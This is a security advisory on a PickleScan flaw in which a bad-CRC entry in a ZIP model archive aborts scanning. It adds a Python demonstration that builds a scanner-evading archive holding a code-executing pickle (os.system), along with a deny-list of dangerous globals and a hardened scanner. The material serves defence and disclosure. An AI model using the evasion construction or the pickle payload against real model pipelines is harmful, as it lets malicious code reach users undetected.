PickleScan ZIP Archive Scanning Component Improper CRC Handling Vulnerability

Vulnerability

A vulnerability in the ZIP archive scanning component of PickleScan allows remote attackers to bypass security scans. The issue arises from improper handling of archive entries whose stored Cyclic Redundancy Check (CRC) value does not match their contents. When the scanner reads such an entry, the ZIP library raises an integrity error; the scanner does not handle it and halts, so the pickle files in the archive are never analyzed. An attacker can therefore ship a crafted ZIP archive (PyTorch model files are ZIP containers) that contains an entry with a bad CRC alongside a malicious pickle, and the harmful code is never inspected.

Impact

Exploitation of this vulnerability allows an attacker to bypass PickleScan entirely: a crafted archive is reported as unscannable rather than as malicious, so malicious pickle payloads can be distributed and, when loaded, executed without detection. Pipelines that treat a PickleScan error exit as a pass rather than a failure are affected.

Reproduction

To reproduce this vulnerability, download a PyTorch model that is known to contain an entry with a bad CRC, such as one from the JinaAI embeddings collection, and scan it with a PickleScan version prior to 0.0.31. The tool returns an error about the ZIP file's integrity and exits without scanning the pickle files the archive contains, so any embedded malicious content is missed.

Remediation

Users should update to PickleScan version 0.0.31 or later, which addresses this vulnerability by changing ZIP handling so that a bad CRC check no longer aborts the scan. Until the upgrade is in place, treat any PickleScan error exit as a failed scan, not a passed one, in automated pipelines.
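The following added example is not PickleScan's own code; it reproduces the mechanism described above offline, standing in for the JinaAI download in the reproduction section. It builds a small PyTorch-style ZIP container in memory whose first entry has a deliberately corrupted CRC, shows that a scanner reading entries in order aborts before it reaches the pickle, and contrasts that with per-entry error handling of the kind the remediation describes. The deny-list of globals, the entry names, the payload and the verdict labels are constructed for illustration.

```python
import io
import os
import pickle
import pickletools
import zipfile

# Illustrative deny-list: importing any of these at unpickle time means code
# execution. Constructed for this example; picklescan maintains its own list.
UNSAFE_GLOBALS = {
    ("os", "system"), ("posix", "system"), ("nt", "system"),
    ("subprocess", "Popen"), ("builtins", "exec"), ("builtins", "eval"),
}
# Opcodes that push a string; STACK_GLOBAL consumes the two most recent as (module, name).
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
              "STRING", "BINSTRING", "SHORT_BINSTRING"}


class Payload:
    """Constructed malicious object: unpickling it calls os.system()."""

    def __reduce__(self):
        return (os.system, ("echo pwned",))


def build_archive(corrupt_crc: bool) -> bytes:
    """Build a PyTorch-style ZIP: a benign entry first, the pickle second.
    With corrupt_crc=True the benign entry's central-directory CRC is flipped,
    so a CRC-checking reader raises zipfile.BadZipFile on it; the pickle entry
    itself is left intact."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("model/version", b"3\n")
        if corrupt_crc:
            zf.getinfo("model/version").CRC ^= 0xFFFFFFFF  # data bytes unchanged
        zf.writestr("model/data.pkl", pickle.dumps(Payload(), protocol=3))
    return buf.getvalue()


def find_unsafe_globals(data: bytes) -> list:
    """Disassemble a pickle with pickletools (never unpickles it) and return
    the dangerous globals it would import as 'module.name' strings."""
    hits, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":                      # protocol <= 3: 'module name'
            module, name = arg.split(" ", 1)
        elif op.name == "STACK_GLOBAL":              # protocol 4+: two strings on the stack
            if len(strings) < 2:
                continue
            module, name = strings[-2], strings[-1]
        else:
            if op.name in STRING_OPS:
                strings.append(arg)
            continue
        if (module, name) in UNSAFE_GLOBALS:
            hits.append(f"{module}.{name}")
    return hits


def first_corrupt_entry(archive: bytes):
    """Cheap integrity pre-check: name of the first entry with a bad CRC, or None."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return zf.testzip()


def naive_scan(archive: bytes):
    """Models the vulnerable behaviour: entries are read in order and the first
    CRC failure aborts the whole scan. Returns the unsafe globals found, or
    None when the scan aborted without a verdict."""
    hits = []
    try:
        with zipfile.ZipFile(io.BytesIO(archive)) as zf:
            for name in zf.namelist():
                data = zf.read(name)  # raises BadZipFile on a CRC mismatch
                if name.endswith(".pkl"):
                    hits.extend(find_unsafe_globals(data))
    except zipfile.BadZipFile:
        return None
    return hits


def hardened_scan(archive: bytes) -> dict:
    """Per-entry error handling: a CRC failure is recorded as a finding and the
    remaining entries, including every pickle, are still inspected. An archive
    with CRC errors is never reported as clean."""
    report = {"unsafe_globals": [], "crc_errors": []}
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            try:
                data = zf.read(info.filename)
            except zipfile.BadZipFile:
                report["crc_errors"].append(info.filename)
                continue
            if info.filename.endswith(".pkl"):
                report["unsafe_globals"].extend(find_unsafe_globals(data))
    if report["unsafe_globals"]:
        report["verdict"] = "malicious"
    elif report["crc_errors"]:
        report["verdict"] = "suspicious"
    else:
        report["verdict"] = "clean"
    return report


if __name__ == "__main__":
    for corrupt in (False, True):
        archive = build_archive(corrupt)
        print(f"corrupt_crc={corrupt}: testzip -> {first_corrupt_entry(archive)!r}")
        print("  naive scan:   ", naive_scan(archive))
        print("  hardened scan:", hardened_scan(archive))
```

Run directly, the intact archive is flagged by both scanners, while the corrupted one makes the naive scanner return no verdict at all even though the pickle entry is readable. Two points carry over to real scanners: `zipfile.ZipFile.testzip()` is a cheap way to detect a bad-CRC entry up front, and when the corrupted entry is the pickle itself, `zf.read()` still raises and the bytes are lost, so the only safe verdict in that case is "suspicious", never "clean".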

Added: Sep 17, 2025, 11:25 AM
Updated: Sep 17, 2025, 2:39 PM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 0.6
exploitability: 5.4
remediation: 7.7
relevance: 0.5
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.